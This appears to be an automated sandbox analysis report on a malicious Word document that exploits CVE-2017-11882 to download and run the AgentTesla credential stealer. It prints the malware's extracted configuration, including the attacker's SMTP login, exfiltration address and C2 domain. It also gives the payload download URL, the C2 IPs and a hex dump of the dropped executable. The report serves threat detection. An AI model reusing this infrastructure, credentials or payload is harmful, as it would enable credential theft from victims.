Play interactive tour

Edit tour

Analysis Report Pending Orders Statement -40064778.doc

Overview

General Information

Sample Name:	Pending Orders Statement -40064778.doc
Analysis ID:	345163
MD5:	47c45cbbc8fa7c9c62efdfcadee09e99
SHA1:	e44f1f16be00551108ece175186d84ce6432a177
SHA256:	1bb9591f1ed79d19e77dd9e9b0c05ee37aa36c317e93e1d275df2a801c05afe6
Tags:	doc
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

.NET source code contains very large array initializations

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Installs a global keyboard hook

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

poiuytrewsdfghjklmnbvcx.exe (PID: 2572 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)

poiuytrewsdfghjklmnbvcx.exe (PID: 2332 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)

poiuytrewsdfghjklmnbvcx.exe (PID: 2712 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, CommandLine: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, NewProcessName: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, OriginalFileName: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, ProcessId: 2572

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 172.111.202.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: poiuytrewsdfghjklmnbvcx.exe.2712.6.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}

Multi AV Scanner detection for submitted file

Show sources

Source: Pending Orders Statement -40064778.doc	Virustotal: Detection: 41%			Perma Link
Source: Pending Orders Statement -40064778.doc	ReversingLabs: Detection: 47%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
Source:	Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
Source:	Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr

Software Vulnerabilities:

Source: global traffic

DNS query: name: cy.kl-re.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://xWUrFiDn0aBmFXBFM.net

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 27 Jan 2021 18:29:36 GMTContent-Type: application/x-msdownloadContent-Length: 246784Connection: keep-aliveLast-Modified: Tue, 26 Jan 2021 23:18:29 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Nginx-Upstream-Cache-Status: EXPIREDX-Server-Powered-By: EngintronAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 03 00 00 0c 00 00 00 00 00 00 1e d4 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 ac d0 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 d3 03 00 57 00 00 00 00 e0 03 00 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 03 00 00 20 00 00 00 b6 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 08 00 00 00 e0 03 00 00 0a 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 03 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 2e 00 00 d0 a4 03 00 0b 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a ba 72 5c 91 00 70 28 4e 03 00 0a 80 01 00 00 04 73 8a 00 00 0a 80 02 00 00 04 72 60 91 00 70 80 03 00 00 04 73 4f 03 00 0a 80 04 00 00 04 2a a6 72 d3 93 00 70 19 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8b 93 00 70 a2 25 18 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8f 93 00 70 a2 25 18 72 8b 93 00 70 a2 25 19 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72

Source: global traffic

HTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.239.147.103 193.239.147.103
Source: Joe Sandbox View	IP Address: 198.54.122.60 198.54.122.60

Source: Joe Sandbox View

ASN Name: BLACKNIGHT-ASIE BLACKNIGHT-ASIE

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587

Source: global traffic

HTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cy.kl-re.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103
Source: unknown	TCP traffic detected without corresponding DNS query: 193.239.147.103

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cy.kl-re.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive

Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: cy.kl-re.com

Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://193.239.147.103
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106510969.0000000000736000.00000004.00000020.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358448912.0000000008426000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.comy
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349117316.00000000006E0000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.6.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabD
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enD
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://duylfM.com
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	String found in binary or memory: http://mail.privateemail.com
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.com/1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/seccli/repository/CPS/
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
